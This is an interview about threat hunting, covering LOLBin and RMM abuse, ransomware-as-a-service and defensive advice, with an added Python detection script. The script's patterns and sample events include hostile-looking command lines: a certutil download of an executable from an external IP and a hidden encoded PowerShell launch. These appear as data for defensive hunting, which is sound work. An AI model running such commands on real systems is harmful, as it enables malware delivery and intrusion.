Why threat hunting is more vital than ever [Q&A]


The threat landscape is rapidly changing and businesses can no longer simply wait for an attack to be caught by traditional tools or decide how to respond after it occurs.
Mike Mitchell, VP of threat intelligence at Intel 471, has experienced the evolution of threat hunting first-hand as he's been in the industry for decades. We spoke to him to learn more.
BN: How have you seen threat hunting evolve in the last decade?
MM: The start of threat hunting in the cybersecurity industry looked like threat intelligence when it first came on the scene; threat hunting was a niche concept that only Fortune 100 companies could afford. Due to the complexity of implementation, cost and talent acquisition, threat hunting was often outsourced to managed service providers (MSPs) and services companies. This trend is shifting back towards organizations' ownership of their logging, data and threat hunting resources, as threat hunting is an integral part of organizations' cybersecurity teams. This growth is evident by the increasing demand for threat hunters in the job market. For example, based on Intel 471's observations, five years ago there were about 300 to 500 open positions for threat hunters, and today that number has grown to approximately 3,000 to 4,000 job openings. This surge in growth shows that organizations understand the importance of threat hunting and are looking to invest in it. Threat hunting's effectiveness and efficiencies will continue to advance with the use of artificial intelligence (AI), but there will always need to be the human element in order for threat hunting to be successful.
BN: Why has threat hunting become a critical step in preventing cyber threats today? What challenges in the past may have prevented organizations from investing in threat hunting?
MM: Organizations can no longer afford to wait and hope their traditional security tools catch today’s sophisticated threats; they need a proactive approach that addresses them earlier and more often. While organizations are rapidly maturing their security postures, threat actors are maturing at the same rate, and companies need to invest in threat hunting to catch threats earlier in the attack chain phase.
The industry went from defending against advanced persistent threats (APTs) that targeted legacy systems to today's living-off-the-land binaries (LOLBins), which are now much more popular among threat actors due to their ability to blend into normal activity and evade traditional security measures. These types of threats leverage systems and processes to 'hide in plain sight,' making them difficult to detect with traditional security tools. Therefore, these attacks become nearly impossible to catch.
As organizations continue to adapt their security measures, business leaders must understand that in order to have a robust security program, they must include threat hunting and a highly skilled team of threat hunters. I firmly believe it is not just about the tools that make threat-hunting successful for an organization but also the people who apply them.
BN: What are the top tactics, techniques, and procedures (TTPs) that threat actors often share today?
MM: We are seeing ransomware groups share information more than ever before and exhibit similar behaviors across the board. This makes it easier for any threat actor to enhance their skills and launch attacks. We observe documentation, new insights on what works and what doesn't and, more recently, ransomware groups establishing ransomware-as-a-service (RaaS) all in the cybercriminal underground. RaaS is a new business model for ransomware groups, where the groups set up infrastructure for a threat actor who doesn’t necessarily have the same level of capabilities or resources to carry out an attack to the same extent as a full group, increasing the frequency of ransomware attacks across all industries.
Threat actors are constantly sharing TTPs -- one example is once they're in a company's network environment, they look for tools already available to leverage, like Remote Management and Monitoring tools (RMM). By leveraging these tools, adversaries can laterally move, gain administrative access, apply scripts and code, all through the already available software and tools on an organization's network.
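The two answers above describe the behaviours a hunter has to look for: LOLBins whose arguments turn them into download or proxy-execution primitives, and RMM software that is legitimate when IT deployed it but suspicious when it appears on a host where it was never sanctioned or runs from a user-writable path. The following is an added example written for this page, not Intel 471's tooling or anything from the interview. It runs a small behaviour-based hunt over constructed process-creation events (the hosts, users, paths, command lines and the per-host RMM baseline are all hypothetical); the LOLBin argument patterns and RMM binary names are illustrative and would be tuned to the environment being hunted.

```python
"""Behaviour-based hunt for LOLBin and RMM abuse in process-creation telemetry.

Added example; event data, hosts and the RMM baseline below are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# LOLBins and the command-line fragments that make them download cradles or
# proxy-execution primitives. Benign uses such as `certutil -hashfile` do not match.
LOLBIN_PATTERNS: dict[str, re.Pattern[str]] = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "mshta.exe": re.compile(r"https?://|vbscript:|javascript:", re.I),
    "regsvr32.exe": re.compile(r"/i:https?://|scrobj\.dll", re.I),
    "bitsadmin.exe": re.compile(r"/transfer|/addfile", re.I),
    "rundll32.exe": re.compile(r"javascript:|url\.dll,", re.I),
    "powershell.exe": re.compile(r"-enc|downloadstring|\biex\b|hidden", re.I),
}

# RMM agents: fine where IT installed them, a lateral-movement tool anywhere else.
RMM_BINARIES = {
    "anydesk.exe", "teamviewer.exe", "screenconnect.clientservice.exe",
    "atera.agent.exe", "splashtop_streamer.exe",
}

# Office applications spawning a LOLBin is a classic phishing-to-execution chain.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Paths an unprivileged user can write to; sanctioned RMM lives under Program Files.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads|desktop)\\|\\temp\\", re.I)


@dataclass
class ProcessEvent:
    host: str
    user: str
    image: str          # full path of the new process
    cmdline: str
    parent_image: str   # full path of the parent process


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events: list[ProcessEvent], rmm_baseline: dict[str, set[str]]) -> list[Finding]:
    """Return one Finding per matched behaviour, in event order.

    rmm_baseline maps host -> set of RMM binary names sanctioned on that host
    (what an asset inventory or software deployment system would provide).
    """
    findings: list[Finding] = []
    for ev in events:
        name, parent = basename(ev.image), basename(ev.parent_image)

        if name in LOLBIN_PATTERNS:
            if parent in OFFICE_PARENTS:
                findings.append(Finding(ev.host, "lolbin_office_child",
                                        f"{parent} -> {name}: {ev.cmdline}"))
            elif LOLBIN_PATTERNS[name].search(ev.cmdline):
                findings.append(Finding(ev.host, "lolbin_suspicious_args",
                                        f"{name}: {ev.cmdline}"))

        if name in RMM_BINARIES:
            if name not in rmm_baseline.get(ev.host, set()):
                findings.append(Finding(ev.host, "rmm_not_in_baseline",
                                        f"{name} run by {ev.user}, not sanctioned on {ev.host}"))
            if USER_WRITABLE.search(ev.image):
                findings.append(Finding(ev.host, "rmm_user_writable_path", ev.image))
    return findings


# Constructed sample telemetry (hypothetical hosts, users and addresses).
SAMPLE_EVENTS = [
    ProcessEvent("WS01", "alice", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://198.51.100.7/up.exe C:\Users\Public\up.exe",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent("WS02", "carol", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -enc SQBFAFgA",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcessEvent("WS03", "bob", r"C:\Users\bob\Downloads\AnyDesk.exe",
                 "AnyDesk.exe --silent", r"C:\Windows\explorer.exe"),
    ProcessEvent("SRV01", "SYSTEM",
                 r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
                 "ScreenConnect.ClientService.exe", r"C:\Windows\System32\services.exe"),
    ProcessEvent("WS01", "alice", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -hashfile C:\Users\alice\report.pdf SHA256",
                 r"C:\Windows\explorer.exe"),
]
SAMPLE_BASELINE = {"SRV01": {"screenconnect.clientservice.exe"}}

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS, SAMPLE_BASELINE):
        print(f"{f.host:6} {f.rule:24} {f.detail}")
```

The sanctioned ScreenConnect service on SRV01 and the benign `certutil -hashfile` produce nothing; the AnyDesk launch from a Downloads folder on a host with no sanctioned RMM produces two findings, which is the "already available software" pattern the answer describes. The baseline is what makes the RMM rule behaviour-based rather than a blanket blocklist: the same binary is noise on one host and a lead on another.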
BN: What are the key components of a proactive, behavior-based approach to threat hunting?
MM: The first step to a proactive, behavior-based approach to threat hunting starts with intelligence. An organization needs to know what is at risk and identify its 'crown jewels' within its environment. This gives security leaders a prioritization plan that threat hunters can focus on, empowering them to be proactive and protect the organization's most valuable assets.
Because of the recent increase in information sharing among threat actors, organizations need to be aware that they could be attacked by threat groups that typically don't go after their specific industry. Opportunistic threat actors and adversaries look for any available vulnerable systems to gain initial access and take advantage of them.
To prevent this from happening, organizations need comprehensive visibility of their environment and data from threat intelligence teams to hunt successfully. Communication is also a huge element of a successful threat hunting approach -- teams must talk to each other. The intelligence team needs to talk to the threat hunting team; the incident response team needs to be involved, as well as the security operations center (SOC) team, to ensure threat hunting is successful across the organization.
BN: Which ransomware groups are at the top of your radar this year, and what are three ways organizations can defend themselves against attacks?
MM: The ransomware groups that remain at the top of our radar this year include RansomHub, LockBit and ALPHV. They share similar behaviors and are targeting industries that can have serious and long-term ramifications, such as financial institutions, retail and industrial control systems.
Here are my top recommendations for best practices all organizations can do to defend themselves:
- Vulnerability and patch management: Attackers are going to leverage vulnerabilities, so organizations need to be aware of their exposure and manage them effectively to prevent attacks.
- Education and a shared mission for security: The traditional methods of leveraging human error through phishing campaigns, impersonation, spoofing, etc., will continue to happen, which is why leaders and security teams need to educate the entire organization on basic security practices and real-world use cases. Ultimately, when teams across an organization share a mission for security, they can enhance their overall security posture.
- Evaluate how tools are managed: Even an organization with the 'best' security tools is at risk if it is not aware of how and where the tool is implemented and what visibility the tool provides. As organizations mature, rather than solely relying on tools, teams must take human action and own their data to prevent attacks successfully.
Image credit: Andrian Supyanda/Dreamstime.com